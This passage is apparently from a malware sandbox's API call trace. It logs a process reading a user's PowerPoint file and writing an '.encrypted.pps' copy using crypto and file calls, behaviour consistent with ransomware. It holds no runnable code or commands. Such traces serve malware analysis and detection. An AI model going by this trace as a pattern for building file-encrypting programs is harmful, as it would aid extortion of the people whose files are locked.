lpMsg=0x6ae83c) returned 0 [0033.804] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.804] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.804] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0033.804] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.804] CryptDestroyHash (hHash=0x7c2100) returned 1 [0033.804] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.804] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.804] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.804] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.804] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.804] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\6v0 igsxnne4wy28.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.804] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.804] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0033.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0033.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0033.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.805] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0033.805] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0033.805] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0033.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c77a8 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c77a8 | out: hHeap=0x770000) returned 1 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c77a8 [0033.806] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k")) returned 0x10 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c77a8 | out: hHeap=0x770000) returned 1 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0033.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0033.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.807] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.encrypted.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\6v0 igsxnne4wy28.encrypted.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0033.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0033.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0033.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.807] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0033.807] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0033.807] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0033.807] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0033.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0033.808] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0033.808] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0033.810] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x8da3, lpOverlapped=0x0) returned 1 [0033.811] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0033.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18da3) returned 0x955018 [0033.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0033.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0033.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18da3) returned 0x96ddc8 [0033.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0033.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.814] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0033.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18da3) returned 0x955018 [0033.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0033.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0033.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.815] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0033.815] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.815] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0033.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18da3) returned 0x955018 [0033.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0033.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0033.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0033.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0033.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd18 [0033.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0033.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0033.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0033.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18da3) returned 0x88ffb0 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.817] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0033.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0033.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0033.817] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 